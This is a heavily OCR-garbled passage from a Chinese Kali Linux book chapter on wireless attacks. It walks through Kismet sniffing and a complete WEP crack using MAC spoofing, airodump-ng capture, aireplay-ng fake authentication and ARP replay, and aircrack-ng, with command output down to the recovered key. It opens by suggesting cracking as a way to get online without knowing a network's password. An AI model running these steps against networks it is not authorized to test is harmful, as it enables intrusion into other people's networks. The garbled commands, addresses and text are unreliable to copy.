要 身份 验证 后 才 可 使 用 。 有 时 候 可 能 急需 要 网 络 ， 但 是 又 不 知道 其 无 线 密码 ， 这 时 
用 户 可 能 非常 着 急 。 刚 好 在 Kali 中 ， 提 供 了 很 多 工具 可 以 破解 无 线 网 络 。 本 章 将 介 
绍 使 用 各 种 渗透 测 斌 工具， 实施 无 线 网 络 攻击 。 


9.1 无 线 网 络 响 探 工具 Kismet 
如 果 要 进行 无 线 网 络 渗 延 测试 ， 则 必须 先 扫 摘 所 有 有 效 的 无 线 援 人 点 。 刚 好 在 Kali 


Linux 中 ， 提 供 了 一 款 嗅 探 无 线 网 络 工具 Kismet。 使 用 该 工具 可 以 测量 周围 的 无 线 
言 号 ， 并 坦 se icri gig 本 节 将 介绍 使 用 Kismet 工 具 嗅 探 无 线 网 络 。 


(1) 启动 Kismet 工 具 。 执 行 命令 如 下 所 示 : 
root@kali:~# kismet 


执行 以 上 命令 后 ， 将 显示 如 图 9.1 所 示 的 界面 。 


root@kali: ~ 
文 忻 (F) imi) 查看 (VY) 搜索 (5) 终端 (T) 帮助 (H) 


b3 met 


Not 
Lonnec tec 





图 9.1 Zum SIE (8 


(2) 该 界面 用 来 设置 是 否 是 用 终端 默认 的 颜色 。 因 为 Kismet 默 认 颜 色 是 灰色 ， 可 
能 一 些 终端 不 能 显示 。 这 里 使 用 默认 的 颜色 ， 选 择 Yes， 将 显示 如 图 9.2 所 示 的 界 
fl. 


root@kali: ^ | | 
SR) 搜索 (5) fS) BH) 
rt View Windows 


wF) ”编辑 伦 ! 
- Kismet S 








LE 4 met 


Not 
onnected 











9.2 使 用 root 用 户 运 行 Kismet 


(3) 该 界面 提示 正在 使 用 root 用 户 运 行 Kismet 工 具 。 此 时 ， 选 择 OK， 将 显示 如 图 
9.3 所 示 的 界面 。 


root@kali: ^ 


XftF) QE) 一 看 (V) 搜索 (5) eT) 标签 人 @) MEH) 


root@kali: = root@kali: = root@kali: = root@kali: /usr/sha... 


ot 
onnected 


= Kismet Sort View Windows 





49.3 目 动 启动 Kismet 服 务 


(4) 该 界面 提示 是 否 要 自动 启动 Kismet 服 务 。 这 里 选择 Yes， 将 显示 如 图 9.4 所 示 
的 界面 。 





9.4 启动 Kismet 服 务 


(5) 该 界面 显示 设置 Kismet 服 务 的 一 些 信息 。 这 里 使 用 默认 设置 ， 并 选择 Start， 
将 显示 如 图 9.5 所 示 的 界面 。 





图 9.5 添加 包 资 源 


(6) 该 界面 显示 没有 被 定义 的 包 资 源 ， 是 否 要 现在 添加 。 这 里 选择 Yes， 将 显示 如 
图 9.6 所 示 的 界面 。 


; 
Intf 





图 9.6 添加 资源 窗口 


(7) 在 该 界面 指定 无 线 网 卡 接口 和 摘 述 信息 。 在 Intf 中 ， 输 入 无 线 网 卡 接口 。 如 果 
无 线 网 卡 已 多 于 监听 模式 ， 可 以 输入 wlan0 或 mon0。 其 他 信息 可 以 不 添加 。 然 后 单 
i Addi, Ig nme 7B REUS. 


root@kali: = 
WFF) 8E) 站 看 [Vi 搜索 (5) HUN) 标签 但 ) 帮助 (H) 


root&pkali root(kalr - raat ka = root@kali: /usr/sha... 





图 9.7 关闭 控制 台 窗 口 
(8) 在 该 界面 选择 Close Console Window 按 钮 ， 将 显示 如 图 9.8 所 示 的 界面 。 


root@kali: ~ 
文件 (F) SSH) BEI) 搜索 (5) ERT) 标签 但 ) RIH) 


root@kali: = root@kali: - root@kali: = root(ükalr /usr/shar... 





Kismet Sort View Windows 
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图 9.8 打 描 的 无 线 信 息 

(9) 该 界面 显示 的 信息 ， 就 是 正在 嗅 探 该 无 线 网 络 中 的 信号 。 当 运行 一 定时 间 
后 ， 停 止 修 改 。 在 该 界面 单 击 Kismet 采 单 选项 并 选择 Quit 命 分 ， 如 图 9.9 所 示 的 界 
Ho 
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图 9.9 退出 Kismet 
(10) 按 下 Quit 命 今后 ， 将 显示 如 图 9.10 所 示 的 界面 。 





图 9.10 停止 Kismet 服 务 


(11) 在 该 界面 单 击 Kill， 将 停止 Kismet 服 务 并 退出 终端 模式 。 此 时 ， 终 端 将 


示 一 些 日 志 信 息 ， 如 下 所 示 : 





383 


+++ KISMET CLIENT IS SHUTTING DOWN +++ 

[SERVER] INFO: Stopped source "wland 

[SERVER] ERROR: TCP server client read() ended for 127.0.0.1 

[SERVER] 

[SERVER] +++ KISMET IS SHUTTING DOWN +++ 

[SERVER] INFO: Closed peapdump log file 'Kismet-20140723-17-19-48-1. pcapdump', 
[SERVER] 155883 logged. 

[SERVER] INFO: Closed netxml log file 'Kismet-20140723-17-19-48-1.netxmf', 26 
[SERVER] logged. 

[SERVER] INFO: Closed nettxt log file 'Kismet-20140723-17-19-48-1.nettxt', 26 

[SERVER] logged. 

[SERVER] INFO: Closed gpsxml log file 'Kismet-20140723-17-19-48-1.gpsxml', 0 logged. 
[SERVER] INFO: Closed alert log file 'Kismet-20140723-17-19-48-1. alert’, 5 logged. 
[SERVER] INFO: Shutting down plugins... 

[SERVER] Shutting down log files... 

[SERVER] WARNING: Kismet changes the configuration of network devices. 


[SERVER] In most cases you will need to restart networking for 
[SERVER] your interface (varies per distribution/OS, but 
[SERVER] usually: /etc/init.d/'networking restart 

[SERVER] 


[SERVER] Kismet exiting. 
Spawned Kismet server has exited 
* KISMET CLIENT SHUTTING DOWN. +++ 


Kismet client exiting. 


从 以 上 信息 的 KISMET IS SHUTTING DOWN 部 分 中 ， 闻 看 到 关闭 了 几 个 日 志 
件 。 这 些 日 志文 件 ， 默认 保存 在 /root/ 目 To 在 这 些 日 志文 件 中 ， 显示 了 生成 日 志 的 
时 间 。 当 运行 Kismet 很 多 次 或 几 天 时 ， 这 些 时 间 是 非常 有 帮助 的 。 


接 下 来 分 析 一 下 上 面 捕获 到 的 数据 。 切 换 到 /root/ 目 录 ， 并 使 用 Is 命 全 查看 以 上 生成 
的 日 志文 件 。 执行 命 Ap TI DAN FB: . 


root@kali:~# ls Kismet -20140723-17-19-48-1.* 

Kismet -20140723-17-19-48-1.alert Kismet-20140723-17-19-48-1.netxm. 
Kismet -20140723-17-19-48-1.gpsxml Kismet -20140723-17-19-48-1.pcapdt 
Kismet -20140723-17-19-48-1.nettxt 


EI puras 


从 输出 的 信息 中 ， 可 以 看 到 有 五 个 日 志文 件 ， HE. KismetL 
具 生 成 的 所 有 信息 ， 都 保存 在 这 些 文 件 中 。 下 面 分 别 介 这 几 个 文件 的 格式 。 


alert : 该 文件 中 包括 所 有 的 警告 信息 。 

gpsxml : 如 果 使 用 了 GPS 源 ， 则 相 天 的 GPS 效 据 保存 在 该 文件 中 。 
nettxt : 包括 所 有 收集 的 文本 输出 信息 。 

netxml : 包括 所 有 XML 格式 的 数 气 。 

pcapdump : 包括 整个 会 话 捕获 的 数据 包 。 


下 面 主 要 介绍 一 下 PCAP 和 Text 文 件 的 工具 。 
1. 使 用 Wireshark 分 析 PCAP 信 号 帧 
(1) 启动 Wireshark。 执 行 命令 如 下 所 示 : 





root@kali:~# wireshark & 
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(2) 打开 pcapdump 文 件 。 在 Wireshark 界 面 的 菜单 栏 中 依次 选择 FilelOpen 命 令 ， 
ee 11 所 示 的 界面 。 


Wireshark: Open Capture File 

































































| 名 称 RS 修改 日 其 
| | Kismet-20140723-17-19-48-1.alert 1.0 KB 17:24 
| ©] Kismet- 20140723-17-19-48-1.gpsxml 264 F? 17:26 
C] Kismet-20140723-17-19-48-1.nettxt 35.7 KB 17:24 
m sm ||) Kismet- 20140723-17-19-48-1.netxml 817KB 17:24 
a 文件 系统 | Kismet 20140723-17-19-48-1.pcapdump 16.8 MB 17:26 
加 ok EL SB LER B linux-3.14.6.tar 534.2 MB 20145£06H11BH 
per aite | Nessus-5.2.6-debian6. i386.deb 28.4MB 20145£04H16E 
- . | replay arp-0723-171023.cap 806 $7 17:11 
| Filter: | [o] Filename: Kismet-20140723-17-19-48-1.pcapdump 
Format: Wireshark/tcpdump/... - libpcap 
Wl Enable MAC name resolution Sire: 17643643 bytes 
LI Enable network name resolution Packets: 155883 
W) Enable transport name resolution First Packet: 2014-07-23 17:21:12 
Elapsed time: 00:05:00 








”取消 (c) || 打开 (0) | 


图 9.11 选择 捕获 的 pcapdump 文 件 


(3) 在 该 界面 选择 Kismet 工 具 捕 获 的 pcapdump 文 件 ， 然 后 单 击 “ 打 开 ” 按 钮 ， 将 显 
示 如 图 9.12 所 示 的 界面 。 





Kismet-20140723-17-19-48-Lpcapdump [Wireshark 1.8.5] 


| 


File Edit View Go Capture Analyze Statistics. Telephony Tools Internals Help 
Beate aexCae ESERE. 


| | a 
Filter: | < Expression... 























No. Tena —— Source | Destination Protocol Length. Info 
0n: el: "m? 75: 0S: Gc n3 ii i en Deaithentic atic on, 5N-0, FRED, , Flagss.. 


















— Tp: SGT P: — .. Q0:cl:4O:78:05:6c — Bü21! ——— 58 Deauthentication, , FM-ü, i 
340001130 Tp-LinkT_ac:fb:20 00:c1:40: 76:05; 6c 802.11 55 Deauthentication, ened, Fue, Flagss... 
440001552 Tp-LinkT_ac:fb:20 00:61:40: 76:05: 6c 802.11 $8 Deauthentication, 5N-0, FN=0, Flage=... 
540001963 Tp-LinkT ac:fb:20 00:c1:40:786:05:6c 802.11 58 Deauthentication, SN=0, FN-0, Flags-... 
ë 0.002905 00:c1:40:756:05:6c [A 80211 42 Acknowledgement, Flagss........ 
70004127 — O0:cl:40:76:05: 6€ Broadcast 502.11 118 Data, 5SN-1500, FN=0, Flagsz.p.....T 
B 0.004936  Tp-LinkT ac:fb:20 00:c1:40:76:05:6c 802.11 58 Deauthentication, SN=0, FN-0, Flagsz... 
9000530 ë Tp-LinkT, ac:fb:20 00:c1:40: 76:05: 6c B02 11 58 Deauthentication, 5NsO, FNeO, Flagss... 

ih FF rnkT Bre Dino à 2 n TRI DA Re ant di ff Daagfhanticatinnm Guon FRENIS FElama- | 


E] 9.12 pcapdump 文 件数 据 包 


(4) 从 该 界面 可 以 看 到 ，Kismet 扫 描 到 的 所 有 无 线 网 络 数据 包 。Beacon 包 是 无 线 
设备 基本 的 管理 包 ， 用 来 发 送信 号 通知 其 他 的 服务 。 


2. 分 析 Kismet 的 Text 文 件 


9.1 无 线 网 络 噢 探 工具 Kismet 385 


在 Linux 中 ， 可 以 使 用 各 种 文本 编辑 器 打开 nettxt 文 件 ， 或 者 使 用 cat 命 令 查 看 该 文件 
内 容 。 下 面 使 用 Linux 默 认 的 文本 编辑 器 打开 nettxt 文 件 ， 如 图 9.13 所 示 。 


Kismet-20140723-17-19-48-1.nettxt (*) = VIM 
文件 (F) 编辑 (E) IAT) 语法 (5) 缓冲 区 (B) BOW) 帮助 (H) 
a &Qe 5e H c3» € aanp ra 
kismat (http: //wew.kismetwireless.net) 


Wed Jul 23 17:19:48 2014 - Kismet 2013.03.RO0 


Network 1: BSSID 14:E6:E4: AC:FB: 20 


Manuf : Tp-LinkT 
First : Wed Jul 23 17:21:12 2014 
Last : Wed Jul 23 17:24:48 2014 
Type : infrastructure 
BSSID : 14:EG6: EA: AC: FB: 20 
SSID 1 
Type : Beacon 
SSID : "Test" 
First : Wed Jul 23 17:21:12 2014 
Last : Wed Jul 23 17:24:48 2014 
Max Rate : 94.0 
Beacon : 16 
Packets : 297 
Encryption : WEP 
Channel : 1 


Frequency : O - 75050 packets, 71.46% 
Frequency : 2412 - 27652 packets, 26.33* 
requency : 2417 - 2302 packets, 2.15% 


x| 


23,1 顶端 
图 9.13 nettxt 文 件 内 容 


从 该 界面 可 以 看 到 nettxt 文 件 中 有 大 量 的 信息 ， 列 出 了 扫 摘 到 的 每 个 无 线 网 络 。 每 
个 无 线 网 络 都 有 一 个 标签 ， 并 且 列 出 了 连接 到 这 些 无 线 网络 的 每 个 客户 病 ， 如 图 
9.14 所 示 。 
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Kismet-2 014072 3-17-19-48-1.nettxt (^) - VIM olx 

文件 (F) RHE LAIM) 语法 (5) 缓冲 区 (B) MO(W) 帮助 (H) 
&ehboe 56 . Ee yee mg» % 
Client 1: MAC 00:C1:40:76:05:6C 

Manuf : Unknown 

First : Wed Jul 23 17:21:12 2014 

Last : Wed Jul 23 17:24:48 2014 

Type : To Distribution 

MAC : QO:C1: 40: 76:05:6C 


Channel : 0 
Frequency : 0 - 74538 packets, 100.00% 
Max Seen : 1000 

. 0 


LLC : 
Data . #4538 
Crypt : 74538 


Fragments : 0 

Retries : D 

Total : 74538 

Datasize : 6385686 

Seen By : wlanO (wlanOmon) bOSSeceO-124a-1lle4-bbef-dcO4bb23e201 74538 packe 
ts 
Wed Jul 23 17:24:48 2014 
Client 2: MAC 14:E6:E4: AC: FB: 20 





Manuf : Tp-LinkT 
First : Wed Jul 23 17:21:12 2014 
Last : Wed Jul 23 17:24:48 2014 


46,1 He 


49.14 Z P ims eB 


从 该 界面 可 以 看 到 一 个 Client1， 其 MAC 地 址 为 00:c1:40:76:05:6c。 它 表示 一 个 
MAC 地 址 为 00:c1:40:76:05:6c 的 客户 端 连接 到 了 一 个 无 线 接 人 点 。 


9.1 无 线 网 络 串 控 工具 Kismet 387 


9.2 使 用 Aircrack-ng 工 具 破 解 无 线 网 络 


Aircrack-ng 是 一 款 基于 破解 无 线 802.11 协 议 的 WEP 及 WPA-PSK 加 密 的 工具 。 该 工 

具 主 要 用 了 两 种 攻击 方式 进行 WEP 破 解 。 一 种 是 FMS 攻 击 ， 该 攻击 方式 是 以 发 现 该 
WEP RSIR RA A Z£ (Scott Fluhrer, Itsik Mantin 及 Adi Shamir) 所 命名 ; Z 

一 种 是 Korek 攻 击 ， 该 攻击 方式 是 通过 统计 进行 攻击 的 ， 并 且 该 攻击 的 效率 要 远 高 

于 FMS 攻 击 。 本 节 将 介绍 使 用 Aircrack-ng 破 解 无 线 网 络 。 


9.2.1 破解 WEP 加 密 的 无 线 网 络 


Wired Equivalent Privacy 或 WEP (有 线 等 效 加 密 ) 协议 是 对 在 两 台 设 备 间 无 线 传 输 
的 数据 进行 加 窗 的 方式 ， 用 以 防止 非法 用 户 守 听 或 侵 和 人 无 线 网 络 。 不 过 窜 码 分 析 学 
家 已 经 找 出 WEP 好 几 个 弱点 ， 因 此 在 2003 年 被 Wi-Fi Protected Access (WPA) 淘 
汰 ， 又 在 2004 年 由 完整 的 IEEE 802.11i 标 准 (又 称 为 NPA2) 所 取代 。 本 小 节 将 介 
绍 人 破解 WEP 加 密 的 无 线 网 络 。 


使 用 Aircrack 和 破解 使 用 WEP 加 密 的 无 线 网 络 。 具 体操 作 步 又 如 下 所 示 。 
(1) 使 用 airmon-ng 命 令 查 看 当前 系统 中 的 无 线 网 络 援 口 。 执 行 命令 如 下 所 示 : 


kali:~# airmon-ng 
Interface Chipset Driver 
wlan Ralink RT2870/3070 rt2800usb - [phy] 


输出 的 信息 表示 ， 当 前 系统 中 存在 一 个 无 线 网 络 接口 。 从 输出 结果 的 Interface 列 ， 
可 以 看 到 当前 系统 的 无 线 接口 为 wlan0。 


(2) 修改 wlan0 接 口 的 MAC 地 址 。 因 为 MAC 地 址 标识 主机 所 在 的 网 络 ， 修 改 主机 
的 MAC 地 址 可 以 隐藏 真实 的 MAC 地 址 。 在 修改 MAC 地 址 之 前 ， 需 要 停止 该 接口 。 
执行 命令 如 下 所 示 : 


root@kali:~# airmon-ng stop wlan0 # 停 止 wano 接口 
Interface Chipset Driver 
wlanü Ralink RT2870/3070 rt2800usb - [phy1] 


(monitor mode disabled) 


或 者 : 


root@kali:~# ifconfig wlanO down 


执行 以 上 命令 后 ，wlan0 接 口 则 停止 。 此 时 残 可 以 修改 MAC 地 址 了 ， 执 行 命 分 如 下 
PAAR : 


root@kali:~# macchanger --mac 00:11:22:33:44:55 wlanO 
Permanent MAC: 00:c1:40:76:05:6c (unknown) 

Current MAC: 00:c1:40:76:05:6c (unknown) 

New MAC: 00:11:22:33:44:55 (Cimsys Inc) 


全 出 的 信息 显示 了 wlan0 接 口 永久 的 MAC 地 址 、 当 前 的 MAC 地 址 及 新 的 MAC 地 址 。 
可 以 看 到 wlan1 接 口 的 MAC 地 址 已 经 被 修改 。 


(3) 重新 启动 wlan0。 执 行 命令 如 下 所 示 : 


root@kali:~# airmon-ng start wlanO 

Found 3 processes that could cause trouble. 

lf airodump-ng, aireplay-ng or airtun-ng stops working after 

a short period of time, you may want to kill (some of) them! 

= 

FID Name 

2967 NetworkManager 

2716 dhclient 

15609 . wpa supplicant 

Interface Chipset Driver 

wland Ralink RT2870/3070 rt2800usb - [phy1] 
(monitor mode enabled on mont) 


输出 的 信息 显示 了 无 线 网 卡 wlan0 的 必 片 及 驱动 类 型 。 例 如 ， 当 前 系统 的 无 线 网 卡 
必 片 为 Ralink RT2870/3070 ; 默认 驱动 为 r[I2800usb， 并 显示 监听 模式 被 启用 ， 映 
射 网 络 接口 为 mon0。 


有 时 候 使 用 airmon-ng start wlan0 命 令 启 用 无 线 网 卡 时 ， 可 能 会 出 现 
SIOCSIFFLAGS: Operation not possible due to RF-kill 错 误 。 这 是 因为 Linux 下 有 一 
个 软件 RF-kill， 该 软件 为 了 省 电 会 将 不 使 用 的 无 线 设备 〈 如 WIFI 和 Buletooth) 目 动 
天 闭 。 当 用 户 使 用 这 些 设备 时 ，RF-kill 不 会 乔 能 的 上 自动 打开 ， 需 要 手动 解锁 。 用 户 
可 以 执行 rfkill list 命 分 查看 所 有 设备 ， 如 下 所 示 : 


root@kali:~# rfkill list 

0: ideapad_wlan: Wireless LAN 
Soft blocked: yes 

Hard blocked: no 

1: phyO: Wireless LAN 

Soft blocked: yes 

Hard blocked: no 


该 列表 中 前 面 的 编号 ， 表 示 的 是 设备 的 索引 号 。 用 户 可 以 通过 指定 索引 号 ， 停 止 或 
启用 有 某 个 设备 。 如 和 启用 所 有 设备 ， 执 行 如 下 所 示 的 命令 : 


root@kali:~# rfkill unblock all 


执行 以 上 命令 后 ， 没 有 任何 信息 输出。 以 上 命令 表示 ， 解 除 所 有 被 关闭 的 设备 。 
(4) 使 用 airodump 命 命定 位 附近 所 有 可 用 的 无 线 网 络 。 执 行 命 合 如 下 所 示 : 


rool@kali:~# airodump-ng wlang 
CH 2][Elapsed: 1 min ]| 2014-05-15 17:21 


BSSID PWR Beacons #Data,#/isCH MB ENC CIPHER AUTH  ESSID 
14:EG:E4:AC:FB-20 -30 40 13 0 1 5e. WEP WEP Test 
8:21:0A:44:09:F8 41 24 2 0 6 Me. WPA2 CCMP PSK _yztxt 
14:EG:EA:84:23:7A -44 17 1 0 1 54e WPA2 CCMP PSK  yztx 
C8:64:C7:2F:A1:34 -64 19 0 0 1 54 OPN CMCC 
1CFA:68:D7:11:8A -64 37 0 0 1 54e WPA2 CCMP PSK TP-LI 
EAC? 2F A134 -64 18 Ü 0 1 54. WPA2 CCMP MGT CMCC- 
DA'G4:C7:2F:A1:34 -64 18 0 O0 1 54. OPN CMCC- 
4A:46:08:C3:99;DC -56 7 0 0 1 54 OPN CMCC- 
E0:05:C5:E 7:68:84 67 17 0 0 1 54. WPA2 CCMP PSK  TP-LI 
5A:46:08:C3:99-DC 67 10 0 0 1 54. WPA2 CCMP MGT CMCC- 
CC34:29'5A:8E ‘BO 8 26 0 0 6 Ste. WPA2 CCMP PSK  TP-LI 
SA 46°08:C 3:99:09 -58 Ü 0 31154 WPA2 CCMP MGT CMCC- 
5:46:08: 3:989:D3 68 16 0 0 6 54. WPA2 CCMP MGT  <leng 
38:46:08: 3:99:;D9 -58 9 0 0 11 54. OPN CMCC 
9CG:21:6A:E8:89:ED -58 27 0 0 11 S4e. WPA2 CCMP PSK  TP-LI 
EA:G4:G 7 2FAO:FF -58 T 0 11 M. WPA2 CCMP MGT CMCC- 


以 上 输出 的 信息 显示 了 附近 所 有 可 用 的 无 线 网 络 。 当 找到 用 户 想 要 攻击 的 无 线路 由 
器 时 ， 按 下 Ctrl+C 键 停止 搜索 。 


从 输出 的 信息 中 看 到 有 很 多 参数 。 详 细 介 绍 如 下 所 示 。 


e BSSID : 无 线 的 IP 地 址 。 
e PWR: 网 卡 报告 的 信号 水 平 。 
e Beacons : 无 线 发 出 的 通告 编号 。 


。Data : 家 捕获 到 的 数据 分 组 的 数量 ， 乌 括 厂 播 分 
组 。 


Is : 过 去 10 秒 钟 内 每 秒 捕获 数据 分 组 的 数量 。 


e CH: 信道 号 (从 Beacons 中 获取 ) 。 

e MB: 无 线 所 支持 的 最 大 速率 。 如 果 MB=11， 它 是 802.11b ; 如 果 MB=22， 它 是 
802.11b+ ; 如 果 更 高 下 是 802.11g。 后 面 的 点 (高 于 54 之 后 ) RAHA 
码 。 

e ENC: 使 用 的 加 密 算 法 体系 。OPN 表 示 无 加 密 。WEP ? 表示 WEP 或 者 
WPA/WPA2 模 式 ，WEP (没有 问号 ) 表示 静态 或 动态 WEP。 如 果 出 现 TKIP 或 
CCMP， 那 么 就 是 WPA/WPA2。 

e CIPHER: 检测 到 的 加 密 算法 ， 是 CCMP、WRAAP、TKIP、WEP 和 WEP104 
中 的 一 个 。 典 型 的 来 说 (不 一 定 ) ，TKIP 与 WPA 结 合 使 用 ，CCMP 与 WPA2 结 
合 使 用 。 如 果 密 钥 识 引 值 大 于 0， 显 示 为 NEP40。 标 准 情况 下 ， 索 引 10-3 是 
40bit，104bit 应 该 是 0。 

e AUTH: 使 用 的 认证 协议 。 常 用 的 有 MGT (WPA/WPA2 使 用 独立 的 认证 服务 
器 ， 平 时 我 们 常 说 的 802.1x、radius 和 eap 等 ) 、SKA (WEP 的 共享 密 钥 ) 、 
PSK (WPA/WPA2 的 预 共 享 密 钥 ) 或 者 OPN (WEP 开 放 式 ) 。 

e ESSID : 指 所 谓 的 SSID 号 。 如 果 馈 用 隐藏 的 SSID 的 话 ， 它 可 以 为 空 。 这 种 情 


况 下 ，airodump-ng 试 图 从 proberesponses 和 associationrequests 中 获取 
SSID。 

e STATION : 客户 端的 MAC 地 址 ， 包 括 连 上 的 和 想 要 搜索 无 线 来 连接 的 客户 
端 。 如 果 客 户 疹 没 有 连接 上 ， 束 在 BSSID 下 显示 “notassociated"。 

e Rate : 表示 传输 率 。 

e Lost : 在 过 去 10 秒 钟 内 丢失 的 数据 分 组 ， 基 于 序列 号 检测 。 它 意味 着 从 客户 病 
来 的 数据 丢 包 ， 每 个 非 管 理 帧 中 都 有 一 个 序列 号 字段 ， 把 刚 接 收 到 的 那个 帧 中 
的 序列 号 和 前 一 个 帧 中 的 序列 号 一 减 束 能 知道 丢 了 几 个 包 。 

e Frames : 客户 剖 发 送 的 数据 分 组 数量 。 

e Probe : WE P m S PRHJESSID, MRE Prim IET E) ARAE, (HER 
连接 上 ， 那 么 束 显 示 在 这 里 。 


(5) 使 用 airodump-ng 捕 获 指定 BSSID 的 文件 。 执 行 命令 如 下 所 示 。 
airodump-ng 命 令 音 用 的 选项 如 下 所 示 。 


e -C : 指定 选择 的 频道 。 
e -W : 指定 一 个 文件 名 ， 用 于 保存 捕获 的 数据 。 
e -bssid : 指定 攻击 的 BSSID。 


下 面 将 Bssid 为 14:E6:E4:AC:FB:20 的 无 线路 由 器 作为 攻击 目标 。 执 行 命令 如 下 所 
7. 


root@kali:~# airodump-ng —c 1 —w wirelessattack --bssid 14:E6:E4:AC:FB:20 mon0 
CH 1 J[ Elapsed: 9 mins ][ 2014-05-15 17:31 


BSSID PWR RXQ Beacons #Data,#/s CH MB ENC CIPHER AUTH ESSID 
14:E6:E4:AC:FB:20 -37 0 5175 216 0 1 54e. WEP WEP OPN Test 
BSSID STATION PWR Rate Lost Frames Probe 
14:E6:E4:AC:FB:20 00:11:22:33:44:55 0 1 117 88836 


Ü = 
14:E6:E4:AC:FB:20 18:DC:56:F0:62:AF -24 o4 -546 654 312 
14:EB: EA: AC:FB:20 08:10: 7 7:0A:53:43 -36 0-1 6 9832 


从 输出 的 信息 中 可 以 看 到 ESSID 为 Test 无 线路 由 器 的 #Data 一 直 在 变化 ， 表 示 有 客 
户 端正 与 无 线 发 生 数 据 交 换 。 以 上 命令 执行 成 功 后 ， 会 生成 一 个 名 为 
wirelessattack-01.ivs 的 文件 ， 而 不 是 wirelessattack.ivs。 这 是 因为 airodump-ng 工 
具 为 了 方便 后 面 破解 的 时 候 调 用 ， 所 有 对 保存 文件 按 顺 序 编 了 号 ， 于 是 束 多 了 -01 
这 样 的 序号 ， 以 此 类 推 。 在 进行 第 二 次 攻击 时 ， 苛 使 用 同样 文件 名 wirelessattack 保 
存 的 话 ， 就 会 生成 名 为 wirelessattack-02.ivs 文 件 。 


《6) 打开 一 个 新 的 终端 窗口 ， 运 行 aireplay 命 令 。aireplay 命 邻 的 语法 格式 如 下 所 
7. 


aireplay-ng -1 © -a [BSSID] -h [our Chosen MAC address] -e [ESSID] 
aireplay-ng -dauth 1 -a [BSSID] -c [our Chosen MAC address] [Interi 


启动 aireplay， 执 行 命 分 如 下 所 示 : 





root@kali:~# aireplay-ng -1 © -a 14:E6:E4:AC:FB:20 -h 00:11:22:33:- 
The interface MAC (00:C1:40:76:05:6C) doesn't match the specified ! 


17: 


17 
17 


17: 
17: 
17: 


17 


17: 
17: 
17: 


17 


17: 
17: 
I7: 


17 


E 


17 
17 
17 
19 
19 
21 
21 
23 
23 
25 
25 
27 
27 
29 
29 


ifconfig monO hw ether 00:11:22:33:44:55 
25 
20: 
dA ay. 
25: 
25: 
25 
2 5 
25: 
25: 
25° 
25 
25 
25: 
25: 
A ae 


Waiting for beacon frame (BSSID: 14:E6:E4:AC:FB:20) on ché 
Sending Authentication Request (Open System) [ACK] 
Switching to shared key authentication 

Sending Authentication Request (Shared Key) [ACK] 
Switching to shared key authentication 

Sending Authentication Request (Shared Key) [ACK] 
Switching to shared key authentication 

Sending Authentication Request (Shared Key) [ACK] 
Switching to shared key authentication 

Sending Authentication Request (Shared Key) [ACK] 
Switching to shared key authentication 

Sending Authentication Request (Shared Key) [ACK] 
Switching to shared key authentication 

Sending Authentication Request (Shared Key) [ACK] 
Switching to shared key authentication 





(7) 使 用 aireplay 发 送 一 些 流量 给 无 线路 由 器 ， 以 至 于 能 够 捕获 到 数据 。 语 法 格式 
如 下 所 示 : 


aireplay-ng 3 -b [BSSID] -h [Our chosen MAC address] [Interface] 


root@kali:~# aireplay-ng -3 
The interface MAC (00:C1:40: 

ifconfig mono hw ether 00: 
17:26:54 Waiting for beacon 
Saving ARP requests in replay arp-0515-172654.cap 


You should also start airodump-ng to capture replies. 


Notice: got a deauth/disassoc packet. 


-b 14:E6:EA4:AC:FB:20 -h 00:11:22:33:44 
76:05:6C) doesn't match the specified ! 
11:22:33:44:55 

frame (BSSID: 14:E6:E4:AC:FB:20) on ché 


Is the source MAC associated 


Read 1259 packets (got 1 ARP requests and 189 ACKs), sent 198 pack: 
Read 1547 packets (got 1 ARP requests and 235 ACKs), sent 248 packt: 
Read 1843 packets (got 1 ARP requests and 285 ACKs), sent 298 packt: 
Read 2150 packets (got 1 ARP requests and 333 ACKs), sent 348 packt: 
Read 2446 packets (got 1 ARP requests and 381 ACKs), sent 398 packt: 
Read 2753 packets (got 1 ARP requests and 430 ACKs), sent 449 pack: 
Read 3058 packets (got 1 ARP requests and 476 ACKs), sent 499 packt: 
Read 3367 packets (got 1 ARP requests and 525 ACKs), sent 548 packt: 
Read 3687 packets (got 1 ARP requests and 576 ACKs), sent 598 packt: 
Read 4001 packets (got 1 ARP requests and 626 ACKs), sent 649 pack: 
Read 4312 packets (got 1 ARP requests and 674 ACKs), sent 699 packt: 
Read 4622 packets (got 1 ARP requests and 719 ACKs), sent 749 pack: 
Read 4929 packets (got 1 ARP requests and 768 ACKs), sent 798 packt: 
Read 5239 packets (got 1 ARP requests and 817 ACKs), sent 848 packt: 


[EL — eae 


ia HH EA) FAL se: HARP Requests 的 方式 来 读 取 ARP 请 求 报 文 的 过 程 ， 此 时 回 到 
airodump-ng 界 面 查看 ， 可 以 看 到 Test 的 Frames 栏 的 数字 在 飞速 的 递增 。 在 抓 取 的 
无 线 数 据 报 文 达到 了 一 定数 量 后 ， 一 般 都 是 指 IVsX 值 达到 2 万 以 上 时 ， 融 可 以 开始 
破解 ， 若 不 能 成 功 就 等 待 数 据 包 文 继续 抓 取 ， 然 后 多 党 试 几 次 。 


(8) 使 用 Aircrack 人 破解 密码 。 执 行 命 全 如 下 所 示 : 


root@kali:~# aircrack-ng -b 14:E6:E4:AC:FB:20 wirelessattack-01.cap 
Opening wirelessattack-01.cap 

Attack will be restarted every 5000 captured ivs. 

Starting PTW attack with 7197 ivs. 





Aircrack-ng 1.2 beta1 

[00:00:54] Tested 15761 keys (got 10002 IVs) 
KB depth — byte(vote) 
0 OF 4 61(17408) BA(16384) 8B(15616) E1(15616) 28(15104) 77(14592) 10(14336) 
1 1/5 62(15360)66(14336) 3C(14080) 76(14080) 5E(13568) 23(13312) 25(13312) 
2 2/13 63(14336)11(14336) 7A(13824) AA(13824) A9(13568) 5D(13568) 7E(13312) 
3 X 7 EF(141336)38(14080) 3E(14080) 8A(14080) D9(14080) DE(14080) 6E(13824) 
4 9/10 65(13824) 36(13568) 42(13568) 8B(13568) BF(13568) 29(13312) 7F(13312) 

KEY FOUND! [ 61:62:63:64:65 ] (ASCII: abcde ) 

Decrypted correctly: 10096 


从 输出 的 结果 中 可 以 看 到 KEY FOUND， 表 示 密 码 已 经 找到 ， 为 abcde。 


9.2.2 破解 WPA/WPA2 无 线 网 络 


WPA 全 名 为 Wi-Fi Protected Access， 有 WPA 和 WPA2 两 个 标准 。 它 是 一 种 保护 无 
线 电 脑 网 络 安全 的 协议 。 对 于 和 启用 WPA/WPA2 加 密 的 无 线 网 络 ， 其 攻击 和 破解 步骤 
及 攻击 是 完全 一 样 的 。 不 同 的 是 ， 在 使 用 airodump-ng 进 行 无 线 探测 的 界面 上 上， 会 


